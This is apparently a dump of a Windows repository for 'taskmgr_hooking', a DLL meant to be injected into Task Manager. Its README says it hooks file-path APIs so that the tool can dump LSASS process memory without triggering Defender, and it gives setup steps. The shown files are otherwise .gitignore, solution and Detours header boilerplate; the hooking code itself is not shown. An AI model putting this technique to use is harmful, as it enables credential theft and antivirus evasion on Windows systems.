├── .gitignore ├── README.md ├── taskmgr_hooking.sln └── taskmgr_hooking ├── Detours ├── include │ ├── detours.h │ ├── detver.h │ └── syelog.h └── lib.X64 │ ├── detours.lib │ ├── detours.pdb │ └── syelog.lib ├── dllmain.cpp ├── framework.h ├── pch.cpp ├── pch.h ├── taskmgr_hooking.vcxproj └── taskmgr_hooking.vcxproj.filters /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Aa][Rr][Mm]/ 27 | [Aa][Rr][Mm]64/ 28 | bld/ 29 | [Bb]in/ 30 | [Oo]bj/ 31 | [Ll]og/ 32 | [Ll]ogs/ 33 | 34 | # Visual Studio 2015/2017 cache/options directory 35 | .vs/ 36 | # Uncomment if you have tasks that create the project's static files in wwwroot 37 | #wwwroot/ 38 | 39 | # Visual Studio 2017 auto generated files 40 | Generated\ Files/ 41 | 42 | # MSTest test Results 43 | [Tt]est[Rr]esult*/ 44 | [Bb]uild[Ll]og.* 45 | 46 | # NUnit 47 | *.VisualState.xml 48 | TestResult.xml 49 | nunit-*.xml 50 | 51 | # Build Results of an ATL Project 52 | [Dd]ebugPS/ 53 | [Rr]eleasePS/ 54 | dlldata.c 55 | 56 | # Benchmark Results 57 | BenchmarkDotNet.Artifacts/ 58 | 59 | # .NET Core 60 | project.lock.json 61 | project.fragment.lock.json 62 | artifacts/ 63 | 64 | # StyleCop 65 | StyleCopReport.xml 66 | 67 | # Files built by Visual Studio 68 | *_i.c 69 | *_p.c 70 | *_h.h 71 | *.ilk 72 | *.meta 73 | *.obj 74 | *.iobj 75 | *.pch 76 | *.pdb 77 | *.ipdb 78 | *.pgc 79 | *.pgd 80 | *.rsp 81 | *.sbr 82 | *.tlb 83 | *.tli 84 | *.tlh 85 | *.tmp 86 | *.tmp_proj 87 | *_wpftmp.csproj 88 | *.log 89 | *.vspscc 90 | *.vssscc 91 | .builds 92 | *.pidb 93 | *.svclog 94 | *.scc 95 | 96 | # Chutzpah Test files 97 | _Chutzpah* 98 | 99 | # Visual C++ cache files 100 | ipch/ 101 | *.aps 102 | *.ncb 103 | *.opendb 104 | *.opensdf 105 | *.sdf 106 | *.cachefile 107 | *.VC.db 108 | *.VC.VC.opendb 109 | 110 | # Visual Studio profiler 111 | *.psess 112 | *.vsp 113 | *.vspx 114 | *.sap 115 | 116 | # Visual Studio Trace Files 117 | *.e2e 118 | 119 | # TFS 2012 Local Workspace 120 | $tf/ 121 | 122 | # Guidance Automation Toolkit 123 | *.gpState 124 | 125 | # ReSharper is a .NET coding add-in 126 | _ReSharper*/ 127 | *.[Rr]e[Ss]harper 128 | *.DotSettings.user 129 | 130 | # TeamCity is a build add-in 131 | _TeamCity* 132 | 133 | # DotCover is a Code Coverage Tool 134 | *.dotCover 135 | 136 | # AxoCover is a Code Coverage Tool 137 | .axoCover/* 138 | !.axoCover/settings.json 139 | 140 | # Visual Studio code coverage results 141 | *.coverage 142 | *.coveragexml 143 | 144 | # NCrunch 145 | _NCrunch_* 146 | .*crunch*.local.xml 147 | nCrunchTemp_* 148 | 149 | # MightyMoose 150 | *.mm.* 151 | AutoTest.Net/ 152 | 153 | # Web workbench (sass) 154 | .sass-cache/ 155 | 156 | # Installshield output folder 157 | [Ee]xpress/ 158 | 159 | # DocProject is a documentation generator add-in 160 | DocProject/buildhelp/ 161 | DocProject/Help/*.HxT 162 | DocProject/Help/*.HxC 163 | DocProject/Help/*.hhc 164 | DocProject/Help/*.hhk 165 | DocProject/Help/*.hhp 166 | DocProject/Help/Html2 167 | DocProject/Help/html 168 | 169 | # Click-Once directory 170 | publish/ 171 | 172 | # Publish Web Output 173 | *.[Pp]ublish.xml 174 | *.azurePubxml 175 | # Note: Comment the next line if you want to checkin your web deploy settings, 176 | # but database connection strings (with potential passwords) will be unencrypted 177 | *.pubxml 178 | *.publishproj 179 | 180 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 181 | # checkin your Azure Web App publish settings, but sensitive information contained 182 | # in these scripts will be unencrypted 183 | PublishScripts/ 184 | 185 | # NuGet Packages 186 | *.nupkg 187 | # NuGet Symbol Packages 188 | *.snupkg 189 | # The packages folder can be ignored because of Package Restore 190 | **/[Pp]ackages/* 191 | # except build/, which is used as an MSBuild target. 192 | !**/[Pp]ackages/build/ 193 | # Uncomment if necessary however generally it will be regenerated when needed 194 | #!**/[Pp]ackages/repositories.config 195 | # NuGet v3's project.json files produces more ignorable files 196 | *.nuget.props 197 | *.nuget.targets 198 | 199 | # Microsoft Azure Build Output 200 | csx/ 201 | *.build.csdef 202 | 203 | # Microsoft Azure Emulator 204 | ecf/ 205 | rcf/ 206 | 207 | # Windows Store app package directories and files 208 | AppPackages/ 209 | BundleArtifacts/ 210 | Package.StoreAssociation.xml 211 | _pkginfo.txt 212 | *.appx 213 | *.appxbundle 214 | *.appxupload 215 | 216 | # Visual Studio cache files 217 | # files ending in .cache can be ignored 218 | *.[Cc]ache 219 | # but keep track of directories ending in .cache 220 | !?*.[Cc]ache/ 221 | 222 | # Others 223 | ClientBin/ 224 | ~$* 225 | *~ 226 | *.dbmdl 227 | *.dbproj.schemaview 228 | *.jfm 229 | *.pfx 230 | *.publishsettings 231 | orleans.codegen.cs 232 | 233 | # Including strong name files can present a security risk 234 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 235 | #*.snk 236 | 237 | # Since there are multiple workflows, uncomment next line to ignore bower_components 238 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 239 | #bower_components/ 240 | 241 | # RIA/Silverlight projects 242 | Generated_Code/ 243 | 244 | # Backup & report files from converting an old project file 245 | # to a newer Visual Studio version. Backup files are not needed, 246 | # because we have git ;-) 247 | _UpgradeReport_Files/ 248 | Backup*/ 249 | UpgradeLog*.XML 250 | UpgradeLog*.htm 251 | ServiceFabricBackup/ 252 | *.rptproj.bak 253 | 254 | # SQL Server files 255 | *.mdf 256 | *.ldf 257 | *.ndf 258 | 259 | # Business Intelligence projects 260 | *.rdl.data 261 | *.bim.layout 262 | *.bim_*.settings 263 | *.rptproj.rsuser 264 | *- [Bb]ackup.rdl 265 | *- [Bb]ackup ([0-9]).rdl 266 | *- [Bb]ackup ([0-9][0-9]).rdl 267 | 268 | # Microsoft Fakes 269 | FakesAssemblies/ 270 | 271 | # GhostDoc plugin setting file 272 | *.GhostDoc.xml 273 | 274 | # Node.js Tools for Visual Studio 275 | .ntvs_analysis.dat 276 | node_modules/ 277 | 278 | # Visual Studio 6 build log 279 | *.plg 280 | 281 | # Visual Studio 6 workspace options file 282 | *.opt 283 | 284 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 285 | *.vbw 286 | 287 | # Visual Studio LightSwitch build output 288 | **/*.HTMLClient/GeneratedArtifacts 289 | **/*.DesktopClient/GeneratedArtifacts 290 | **/*.DesktopClient/ModelManifest.xml 291 | **/*.Server/GeneratedArtifacts 292 | **/*.Server/ModelManifest.xml 293 | _Pvt_Extensions 294 | 295 | # Paket dependency manager 296 | .paket/paket.exe 297 | paket-files/ 298 | 299 | # FAKE - F# Make 300 | .fake/ 301 | 302 | # CodeRush personal settings 303 | .cr/personal 304 | 305 | # Python Tools for Visual Studio (PTVS) 306 | __pycache__/ 307 | *.pyc 308 | 309 | # Cake - Uncomment if you are using it 310 | # tools/** 311 | # !tools/packages.config 312 | 313 | # Tabs Studio 314 | *.tss 315 | 316 | # Telerik's JustMock configuration file 317 | *.jmconfig 318 | 319 | # BizTalk build output 320 | *.btp.cs 321 | *.btm.cs 322 | *.odx.cs 323 | *.xsd.cs 324 | 325 | # OpenCover UI analysis results 326 | OpenCover/ 327 | 328 | # Azure Stream Analytics local run output 329 | ASALocalRun/ 330 | 331 | # MSBuild Binary and Structured Log 332 | *.binlog 333 | 334 | # NVidia Nsight GPU debugger configuration file 335 | *.nvuser 336 | 337 | # MFractors (Xamarin productivity tool) working folder 338 | .mfractor/ 339 | 340 | # Local History for Visual Studio 341 | .localhistory/ 342 | 343 | # BeatPulse healthcheck temp database 344 | healthchecksdb 345 | 346 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 347 | MigrationBackup/ 348 | 349 | # Ionide (cross platform F# VS Code tools) working folder 350 | .ionide/ 351 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # taskmgr_hooking 2 | 3 | Dump LSASS process in Task Manager without triggering Defender. 4 | 5 | Hooks API calls 6 | ``` 7 | RtlInitUnicodeString 8 | RtlInitUnicodeStringEx 9 | RtlDosPathNameToRelativeNtPathName_U 10 | RtlDosPathNameToRelativeNtPathName_U_WithStatus 11 | SetDlgItemTextW 12 | ``` 13 | And changes the file path from `C:\Users\\AppData\Local\Temp\lsass.DMP` to what ever you specify in the `newStr` variable. 14 |
15 |
16 | Update `newStr` with the new path you want, and update the username in the `matchStr` variable. 17 |
18 |
19 | Compiles to a DLL that you can [inject](https://github.com/djackreuter/dllinject) into Taskmgr.exe 20 | 21 | ![image](https://user-images.githubusercontent.com/27731554/229834820-103269a6-027e-4cc6-9113-c2c24622368e.png) 22 | -------------------------------------------------------------------------------- /taskmgr_hooking.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.1.32414.318 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "taskmgr_hooking", "taskmgr_hooking\taskmgr_hooking.vcxproj", "{6E541BA4-6793-4C99-8EF6-42A48F047892}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {6E541BA4-6793-4C99-8EF6-42A48F047892}.Debug|x64.ActiveCfg = Debug|x64 17 | {6E541BA4-6793-4C99-8EF6-42A48F047892}.Debug|x64.Build.0 = Debug|x64 18 | {6E541BA4-6793-4C99-8EF6-42A48F047892}.Debug|x86.ActiveCfg = Debug|Win32 19 | {6E541BA4-6793-4C99-8EF6-42A48F047892}.Debug|x86.Build.0 = Debug|Win32 20 | {6E541BA4-6793-4C99-8EF6-42A48F047892}.Release|x64.ActiveCfg = Release|x64 21 | {6E541BA4-6793-4C99-8EF6-42A48F047892}.Release|x64.Build.0 = Release|x64 22 | {6E541BA4-6793-4C99-8EF6-42A48F047892}.Release|x86.ActiveCfg = Release|Win32 23 | {6E541BA4-6793-4C99-8EF6-42A48F047892}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {4D350F3D-D967-4DAC-9570-A3354313FD94} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /taskmgr_hooking/Detours/include/detours.h: -------------------------------------------------------------------------------- 1 | ///////////////////////////////////////////////////////////////////////////// 2 | // 3 | // Core Detours Functionality (detours.h of detours.lib) 4 | // 5 | // Microsoft Research Detours Package, Version 4.0.1 6 | // 7 | // Copyright (c) Microsoft Corporation. All rights reserved. 8 | // 9 | 10 | #pragma once 11 | #ifndef _DETOURS_H_ 12 | #define _DETOURS_H_ 13 | 14 | #define DETOURS_VERSION 0x4c0c1 // 0xMAJORcMINORcPATCH 15 | 16 | ////////////////////////////////////////////////////////////////////////////// 17 | // 18 | 19 | #ifdef DETOURS_INTERNAL 20 | 21 | #define _CRT_STDIO_ARBITRARY_WIDE_SPECIFIERS 1 22 | #define _ARM_WINAPI_PARTITION_DESKTOP_SDK_AVAILABLE 1 23 | 24 | #pragma warning(disable:4068) // unknown pragma (suppress) 25 | 26 | #if _MSC_VER >= 1900 27 | #pragma warning(push) 28 | #pragma warning(disable:4091) // empty typedef 29 | #endif 30 | 31 | // Suppress declspec(dllimport) for the sake of Detours 32 | // users that provide kernel32 functionality themselves. 33 | // This is ok in the mainstream case, it will just cost 34 | // an extra instruction calling some functions, which 35 | // LTCG optimizes away. 36 | // 37 | #define _KERNEL32_ 1 38 | #define _USER32_ 1 39 | 40 | #include 41 | #if (_MSC_VER < 1310) 42 | #else 43 | #pragma warning(push) 44 | #if _MSC_VER > 1400 45 | #pragma warning(disable:6102 6103) // /analyze warnings 46 | #endif 47 | #include 48 | #include 49 | #pragma warning(pop) 50 | #endif 51 | #include 52 | 53 | // Allow Detours to cleanly compile with the MingW toolchain. 54 | // 55 | #ifdef __GNUC__ 56 | #define __try 57 | #define __except(x) if (0) 58 | #include 59 | #include 60 | #endif 61 | 62 | // From winerror.h, as this error isn't found in some SDKs: 63 | // 64 | // MessageId: ERROR_DYNAMIC_CODE_BLOCKED 65 | // 66 | // MessageText: 67 | // 68 | // The operation was blocked as the process prohibits dynamic code generation. 69 | // 70 | #define ERROR_DYNAMIC_CODE_BLOCKED 1655L 71 | 72 | #endif // DETOURS_INTERNAL 73 | 74 | ////////////////////////////////////////////////////////////////////////////// 75 | // 76 | 77 | #undef DETOURS_X64 78 | #undef DETOURS_X86 79 | #undef DETOURS_IA64 80 | #undef DETOURS_ARM 81 | #undef DETOURS_ARM64 82 | #undef DETOURS_BITS 83 | #undef DETOURS_32BIT 84 | #undef DETOURS_64BIT 85 | 86 | #if defined(_X86_) 87 | #define DETOURS_X86 88 | #define DETOURS_OPTION_BITS 64 89 | 90 | #elif defined(_AMD64_) 91 | #define DETOURS_X64 92 | #define DETOURS_OPTION_BITS 32 93 | 94 | #elif defined(_IA64_) 95 | #define DETOURS_IA64 96 | #define DETOURS_OPTION_BITS 32 97 | 98 | #elif defined(_ARM_) 99 | #define DETOURS_ARM 100 | 101 | #elif defined(_ARM64_) 102 | #define DETOURS_ARM64 103 | 104 | #else 105 | #error Unknown architecture (x86, amd64, ia64, arm, arm64) 106 | #endif 107 | 108 | #ifdef _WIN64 109 | #undef DETOURS_32BIT 110 | #define DETOURS_64BIT 1 111 | #define DETOURS_BITS 64 112 | // If all 64bit kernels can run one and only one 32bit architecture. 113 | //#define DETOURS_OPTION_BITS 32 114 | #else 115 | #define DETOURS_32BIT 1 116 | #undef DETOURS_64BIT 117 | #define DETOURS_BITS 32 118 | // If all 64bit kernels can run one and only one 32bit architecture. 119 | //#define DETOURS_OPTION_BITS 32 120 | #endif 121 | 122 | /////////////////////////////////////////////////////////////// Helper Macros. 123 | // 124 | #define DETOURS_STRINGIFY_(x) #x 125 | #define DETOURS_STRINGIFY(x) DETOURS_STRINGIFY_(x) 126 | 127 | #define VER_DETOURS_BITS DETOURS_STRINGIFY(DETOURS_BITS) 128 | 129 | ////////////////////////////////////////////////////////////////////////////// 130 | // 131 | 132 | #if (_MSC_VER < 1299) && !defined(__MINGW32__) 133 | typedef LONG LONG_PTR; 134 | typedef ULONG ULONG_PTR; 135 | #endif 136 | 137 | ///////////////////////////////////////////////// SAL 2.0 Annotations w/o SAL. 138 | // 139 | // These definitions are include so that Detours will build even if the 140 | // compiler doesn't have full SAL 2.0 support. 141 | // 142 | #ifndef DETOURS_DONT_REMOVE_SAL_20 143 | 144 | #ifdef DETOURS_TEST_REMOVE_SAL_20 145 | #undef _Analysis_assume_ 146 | #undef _Benign_race_begin_ 147 | #undef _Benign_race_end_ 148 | #undef _Field_range_ 149 | #undef _Field_size_ 150 | #undef _In_ 151 | #undef _In_bytecount_ 152 | #undef _In_count_ 153 | #undef __in_ecount 154 | #undef _In_opt_ 155 | #undef _In_opt_bytecount_ 156 | #undef _In_opt_count_ 157 | #undef _In_opt_z_ 158 | #undef _In_range_ 159 | #undef _In_reads_ 160 | #undef _In_reads_bytes_ 161 | #undef _In_reads_opt_ 162 | #undef _In_reads_opt_bytes_ 163 | #undef _In_reads_or_z_ 164 | #undef _In_z_ 165 | #undef _Inout_ 166 | #undef _Inout_opt_ 167 | #undef _Inout_z_count_ 168 | #undef _Out_ 169 | #undef _Out_opt_ 170 | #undef _Out_writes_ 171 | #undef _Outptr_result_maybenull_ 172 | #undef _Readable_bytes_ 173 | #undef _Success_ 174 | #undef _Writable_bytes_ 175 | #undef _Pre_notnull_ 176 | #endif 177 | 178 | #if defined(_Deref_out_opt_z_) && !defined(_Outptr_result_maybenull_) 179 | #define _Outptr_result_maybenull_ _Deref_out_opt_z_ 180 | #endif 181 | 182 | #if defined(_In_count_) && !defined(_In_reads_) 183 | #define _In_reads_(x) _In_count_(x) 184 | #endif 185 | 186 | #if defined(_In_opt_count_) && !defined(_In_reads_opt_) 187 | #define _In_reads_opt_(x) _In_opt_count_(x) 188 | #endif 189 | 190 | #if defined(_In_opt_bytecount_) && !defined(_In_reads_opt_bytes_) 191 | #define _In_reads_opt_bytes_(x) _In_opt_bytecount_(x) 192 | #endif 193 | 194 | #if defined(_In_bytecount_) && !defined(_In_reads_bytes_) 195 | #define _In_reads_bytes_(x) _In_bytecount_(x) 196 | #endif 197 | 198 | #ifndef _In_ 199 | #define _In_ 200 | #endif 201 | 202 | #ifndef _In_bytecount_ 203 | #define _In_bytecount_(x) 204 | #endif 205 | 206 | #ifndef _In_count_ 207 | #define _In_count_(x) 208 | #endif 209 | 210 | #ifndef __in_ecount 211 | #define __in_ecount(x) 212 | #endif 213 | 214 | #ifndef _In_opt_ 215 | #define _In_opt_ 216 | #endif 217 | 218 | #ifndef _In_opt_bytecount_ 219 | #define _In_opt_bytecount_(x) 220 | #endif 221 | 222 | #ifndef _In_opt_count_ 223 | #define _In_opt_count_(x) 224 | #endif 225 | 226 | #ifndef _In_opt_z_ 227 | #define _In_opt_z_ 228 | #endif 229 | 230 | #ifndef _In_range_ 231 | #define _In_range_(x,y) 232 | #endif 233 | 234 | #ifndef _In_reads_ 235 | #define _In_reads_(x) 236 | #endif 237 | 238 | #ifndef _In_reads_bytes_ 239 | #define _In_reads_bytes_(x) 240 | #endif 241 | 242 | #ifndef _In_reads_opt_ 243 | #define _In_reads_opt_(x) 244 | #endif 245 | 246 | #ifndef _In_reads_opt_bytes_ 247 | #define _In_reads_opt_bytes_(x) 248 | #endif 249 | 250 | #ifndef _In_reads_or_z_ 251 | #define _In_reads_or_z_ 252 | #endif 253 | 254 | #ifndef _In_z_ 255 | #define _In_z_ 256 | #endif 257 | 258 | #ifndef _Inout_ 259 | #define _Inout_ 260 | #endif 261 | 262 | #ifndef _Inout_opt_ 263 | #define _Inout_opt_ 264 | #endif 265 | 266 | #ifndef _Inout_z_count_ 267 | #define _Inout_z_count_(x) 268 | #endif 269 | 270 | #ifndef _Out_ 271 | #define _Out_ 272 | #endif 273 | 274 | #ifndef _Out_opt_ 275 | #define _Out_opt_ 276 | #endif 277 | 278 | #ifndef _Out_writes_ 279 | #define _Out_writes_(x) 280 | #endif 281 | 282 | #ifndef _Outptr_result_maybenull_ 283 | #define _Outptr_result_maybenull_ 284 | #endif 285 | 286 | #ifndef _Writable_bytes_ 287 | #define _Writable_bytes_(x) 288 | #endif 289 | 290 | #ifndef _Readable_bytes_ 291 | #define _Readable_bytes_(x) 292 | #endif 293 | 294 | #ifndef _Success_ 295 | #define _Success_(x) 296 | #endif 297 | 298 | #ifndef _Pre_notnull_ 299 | #define _Pre_notnull_ 300 | #endif 301 | 302 | #ifdef DETOURS_INTERNAL 303 | 304 | #pragma warning(disable:4615) // unknown warning type (suppress with older compilers) 305 | 306 | #ifndef _Benign_race_begin_ 307 | #define _Benign_race_begin_ 308 | #endif 309 | 310 | #ifndef _Benign_race_end_ 311 | #define _Benign_race_end_ 312 | #endif 313 | 314 | #ifndef _Field_size_ 315 | #define _Field_size_(x) 316 | #endif 317 | 318 | #ifndef _Field_range_ 319 | #define _Field_range_(x,y) 320 | #endif 321 | 322 | #ifndef _Analysis_assume_ 323 | #define _Analysis_assume_(x) 324 | #endif 325 | 326 | #endif // DETOURS_INTERNAL 327 | #endif // DETOURS_DONT_REMOVE_SAL_20 328 | 329 | ////////////////////////////////////////////////////////////////////////////// 330 | // 331 | #ifndef GUID_DEFINED 332 | #define GUID_DEFINED 333 | typedef struct _GUID 334 | { 335 | DWORD Data1; 336 | WORD Data2; 337 | WORD Data3; 338 | BYTE Data4[ 8 ]; 339 | } GUID; 340 | 341 | #ifdef INITGUID 342 | #define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \ 343 | const GUID name \ 344 | = { l, w1, w2, { b1, b2, b3, b4, b5, b6, b7, b8 } } 345 | #else 346 | #define DEFINE_GUID(name, l, w1, w2, b1, b2, b3, b4, b5, b6, b7, b8) \ 347 | const GUID name 348 | #endif // INITGUID 349 | #endif // !GUID_DEFINED 350 | 351 | #if defined(__cplusplus) 352 | #ifndef _REFGUID_DEFINED 353 | #define _REFGUID_DEFINED 354 | #define REFGUID const GUID & 355 | #endif // !_REFGUID_DEFINED 356 | #else // !__cplusplus 357 | #ifndef _REFGUID_DEFINED 358 | #define _REFGUID_DEFINED 359 | #define REFGUID const GUID * const 360 | #endif // !_REFGUID_DEFINED 361 | #endif // !__cplusplus 362 | 363 | #ifndef ARRAYSIZE 364 | #define ARRAYSIZE(x) (sizeof(x)/sizeof(x[0])) 365 | #endif 366 | 367 | // 368 | ////////////////////////////////////////////////////////////////////////////// 369 | 370 | #ifdef __cplusplus 371 | extern "C" { 372 | #endif // __cplusplus 373 | 374 | /////////////////////////////////////////////////// Instruction Target Macros. 375 | // 376 | #define DETOUR_INSTRUCTION_TARGET_NONE ((PVOID)0) 377 | #define DETOUR_INSTRUCTION_TARGET_DYNAMIC ((PVOID)(LONG_PTR)-1) 378 | #define DETOUR_SECTION_HEADER_SIGNATURE 0x00727444 // "Dtr\0" 379 | 380 | extern const GUID DETOUR_EXE_RESTORE_GUID; 381 | extern const GUID DETOUR_EXE_HELPER_GUID; 382 | 383 | #define DETOUR_TRAMPOLINE_SIGNATURE 0x21727444 // Dtr! 384 | typedef struct _DETOUR_TRAMPOLINE DETOUR_TRAMPOLINE, *PDETOUR_TRAMPOLINE; 385 | 386 | #ifndef DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS 387 | #define DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS 32 388 | #endif // !DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS 389 | 390 | /////////////////////////////////////////////////////////// Binary Structures. 391 | // 392 | #pragma pack(push, 8) 393 | typedef struct _DETOUR_SECTION_HEADER 394 | { 395 | DWORD cbHeaderSize; 396 | DWORD nSignature; 397 | DWORD nDataOffset; 398 | DWORD cbDataSize; 399 | 400 | DWORD nOriginalImportVirtualAddress; 401 | DWORD nOriginalImportSize; 402 | DWORD nOriginalBoundImportVirtualAddress; 403 | DWORD nOriginalBoundImportSize; 404 | 405 | DWORD nOriginalIatVirtualAddress; 406 | DWORD nOriginalIatSize; 407 | DWORD nOriginalSizeOfImage; 408 | DWORD cbPrePE; 409 | 410 | DWORD nOriginalClrFlags; 411 | DWORD reserved1; 412 | DWORD reserved2; 413 | DWORD reserved3; 414 | 415 | // Followed by cbPrePE bytes of data. 416 | } DETOUR_SECTION_HEADER, *PDETOUR_SECTION_HEADER; 417 | 418 | typedef struct _DETOUR_SECTION_RECORD 419 | { 420 | DWORD cbBytes; 421 | DWORD nReserved; 422 | GUID guid; 423 | } DETOUR_SECTION_RECORD, *PDETOUR_SECTION_RECORD; 424 | 425 | typedef struct _DETOUR_CLR_HEADER 426 | { 427 | // Header versioning 428 | ULONG cb; 429 | USHORT MajorRuntimeVersion; 430 | USHORT MinorRuntimeVersion; 431 | 432 | // Symbol table and startup information 433 | IMAGE_DATA_DIRECTORY MetaData; 434 | ULONG Flags; 435 | 436 | // Followed by the rest of the IMAGE_COR20_HEADER 437 | } DETOUR_CLR_HEADER, *PDETOUR_CLR_HEADER; 438 | 439 | typedef struct _DETOUR_EXE_RESTORE 440 | { 441 | DWORD cb; 442 | DWORD cbidh; 443 | DWORD cbinh; 444 | DWORD cbclr; 445 | 446 | PBYTE pidh; 447 | PBYTE pinh; 448 | PBYTE pclr; 449 | 450 | IMAGE_DOS_HEADER idh; 451 | union { 452 | IMAGE_NT_HEADERS inh; // all environments have this 453 | #ifdef IMAGE_NT_OPTIONAL_HDR32_MAGIC // some environments do not have this 454 | IMAGE_NT_HEADERS32 inh32; 455 | #endif 456 | #ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC // some environments do not have this 457 | IMAGE_NT_HEADERS64 inh64; 458 | #endif 459 | #ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC // some environments do not have this 460 | BYTE raw[sizeof(IMAGE_NT_HEADERS64) + 461 | sizeof(IMAGE_SECTION_HEADER) * DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS]; 462 | #else 463 | BYTE raw[0x108 + sizeof(IMAGE_SECTION_HEADER) * DETOUR_MAX_SUPPORTED_IMAGE_SECTION_HEADERS]; 464 | #endif 465 | }; 466 | DETOUR_CLR_HEADER clr; 467 | 468 | } DETOUR_EXE_RESTORE, *PDETOUR_EXE_RESTORE; 469 | 470 | #ifdef IMAGE_NT_OPTIONAL_HDR64_MAGIC 471 | C_ASSERT(sizeof(IMAGE_NT_HEADERS64) == 0x108); 472 | #endif 473 | 474 | // The size can change, but assert for clarity due to the muddying #ifdefs. 475 | #ifdef _WIN64 476 | C_ASSERT(sizeof(DETOUR_EXE_RESTORE) == 0x688); 477 | #else 478 | C_ASSERT(sizeof(DETOUR_EXE_RESTORE) == 0x678); 479 | #endif 480 | 481 | typedef struct _DETOUR_EXE_HELPER 482 | { 483 | DWORD cb; 484 | DWORD pid; 485 | DWORD nDlls; 486 | CHAR rDlls[4]; 487 | } DETOUR_EXE_HELPER, *PDETOUR_EXE_HELPER; 488 | 489 | #pragma pack(pop) 490 | 491 | #define DETOUR_SECTION_HEADER_DECLARE(cbSectionSize) \ 492 | { \ 493 | sizeof(DETOUR_SECTION_HEADER),\ 494 | DETOUR_SECTION_HEADER_SIGNATURE,\ 495 | sizeof(DETOUR_SECTION_HEADER),\ 496 | (cbSectionSize),\ 497 | \ 498 | 0,\ 499 | 0,\ 500 | 0,\ 501 | 0,\ 502 | \ 503 | 0,\ 504 | 0,\ 505 | 0,\ 506 | 0,\ 507 | } 508 | 509 | ///////////////////////////////////////////////////////////// Binary Typedefs. 510 | // 511 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_BYWAY_CALLBACK)( 512 | _In_opt_ PVOID pContext, 513 | _In_opt_ LPCSTR pszFile, 514 | _Outptr_result_maybenull_ LPCSTR *ppszOutFile); 515 | 516 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_FILE_CALLBACK)( 517 | _In_opt_ PVOID pContext, 518 | _In_ LPCSTR pszOrigFile, 519 | _In_ LPCSTR pszFile, 520 | _Outptr_result_maybenull_ LPCSTR *ppszOutFile); 521 | 522 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_SYMBOL_CALLBACK)( 523 | _In_opt_ PVOID pContext, 524 | _In_ ULONG nOrigOrdinal, 525 | _In_ ULONG nOrdinal, 526 | _Out_ ULONG *pnOutOrdinal, 527 | _In_opt_ LPCSTR pszOrigSymbol, 528 | _In_opt_ LPCSTR pszSymbol, 529 | _Outptr_result_maybenull_ LPCSTR *ppszOutSymbol); 530 | 531 | typedef BOOL (CALLBACK *PF_DETOUR_BINARY_COMMIT_CALLBACK)( 532 | _In_opt_ PVOID pContext); 533 | 534 | typedef BOOL (CALLBACK *PF_DETOUR_ENUMERATE_EXPORT_CALLBACK)(_In_opt_ PVOID pContext, 535 | _In_ ULONG nOrdinal, 536 | _In_opt_ LPCSTR pszName, 537 | _In_opt_ PVOID pCode); 538 | 539 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FILE_CALLBACK)(_In_opt_ PVOID pContext, 540 | _In_opt_ HMODULE hModule, 541 | _In_opt_ LPCSTR pszFile); 542 | 543 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FUNC_CALLBACK)(_In_opt_ PVOID pContext, 544 | _In_ DWORD nOrdinal, 545 | _In_opt_ LPCSTR pszFunc, 546 | _In_opt_ PVOID pvFunc); 547 | 548 | // Same as PF_DETOUR_IMPORT_FUNC_CALLBACK but extra indirection on last parameter. 549 | typedef BOOL (CALLBACK *PF_DETOUR_IMPORT_FUNC_CALLBACK_EX)(_In_opt_ PVOID pContext, 550 | _In_ DWORD nOrdinal, 551 | _In_opt_ LPCSTR pszFunc, 552 | _In_opt_ PVOID* ppvFunc); 553 | 554 | typedef VOID * PDETOUR_BINARY; 555 | typedef VOID * PDETOUR_LOADED_BINARY; 556 | 557 | //////////////////////////////////////////////////////////// Transaction APIs. 558 | // 559 | LONG WINAPI DetourTransactionBegin(VOID); 560 | LONG WINAPI DetourTransactionAbort(VOID); 561 | LONG WINAPI DetourTransactionCommit(VOID); 562 | LONG WINAPI DetourTransactionCommitEx(_Out_opt_ PVOID **pppFailedPointer); 563 | 564 | LONG WINAPI DetourUpdateThread(_In_ HANDLE hThread); 565 | 566 | LONG WINAPI DetourAttach(_Inout_ 